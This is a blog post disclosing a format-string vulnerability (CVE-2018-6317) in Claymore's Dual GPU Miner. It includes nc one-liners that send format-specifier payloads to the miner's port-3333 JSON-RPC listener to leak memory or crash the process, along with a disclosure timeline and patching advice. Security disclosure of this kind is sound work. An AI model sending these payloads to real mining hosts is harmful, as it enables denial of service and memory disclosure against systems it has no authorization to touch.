Image for post
Image for post
Cryptominer by Maggie Appleton

Cryptominer Disclosure: Claymore Dual Gpu Miner Format Strings Vulnerability

res1n
res1n
Jan 31, 2018 · 2 min read

CVE-2018–6317

Claymore’s Dual GPU Miner 10.5 and below is vulnerable to a format strings vulnerability. This allows an unauthenticated attacker to read memory addresses, or immediately terminate the mining process causing a denial of service.

After reading about the recent vulnerabilities with previous versions, I thought I should take another look at the json listener on port 3333 and see if there was any avenues of attack.

echo -e '{"id":1,"jsonrpc":"1.0","method":"test"}' | nc 192.168.1.107 3333 & printf "\n"
Image for post
Image for post

After realizing the buffer was printed I decided to try a few others…

echo -e '{"id":1,"jsonrpc":"1.0","method":"%x %x %x %x"}' | nc 192.168.1.139 3333 & printf "\n"
Image for post
Image for post

Sending %s does return some strings, however I couldn’t get the hex addresses padded properly to dig in more as I kept getting unable to parse json errors. Sending %p also did yield some results but I’m sure someone more qualified may be able to exploit the stack further…

Finally, sending %n completely kills the mining process.

echo -e '{"id":1,"jsonrpc":"1.0","method":"%n"}' | nc 192.168.1.139 3333 & printf "\n"
Image for post
Image for post

Keep your rigs up to date, or stop opening port 3333 to the public. Seriously.

Timeline

01/26/18 — Reported

01/26/18 —Confirmed and immediately patched. 10.6 released request for 3–4 day embargo

01/31/18 — Public Disclosure

Claymore’s Miner — https://bitcointalk.org/index.php?topic=1433925.0

Editors Note: Put a WEBGAP between you and the malware with a browser isolation technology or by leveraging a remote browser service.

secjuice™

secjuice™ is your daily shot of opinion, analysis & insight…

res1n

Written by

res1n

secjuice™

secjuice™ is your daily shot of opinion, analysis & insight from some of the sharpest wits in cybersecurity, information security, network security and OSINT.

res1n

Written by

res1n

secjuice™

secjuice™ is your daily shot of opinion, analysis & insight from some of the sharpest wits in cybersecurity, information security, network security and OSINT.

Medium is an open platform where 170 million readers come to find insightful and dynamic thinking. Here, expert and undiscovered voices alike dive into the heart of any topic and bring new ideas to the surface. Learn more

Follow the writers, publications, and topics that matter to you, and you’ll see them on your homepage and in your inbox. Explore

If you have a story to tell, knowledge to share, or a perspective to offer — welcome home. It’s easy and free to post your thinking on any topic. Write on Medium

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store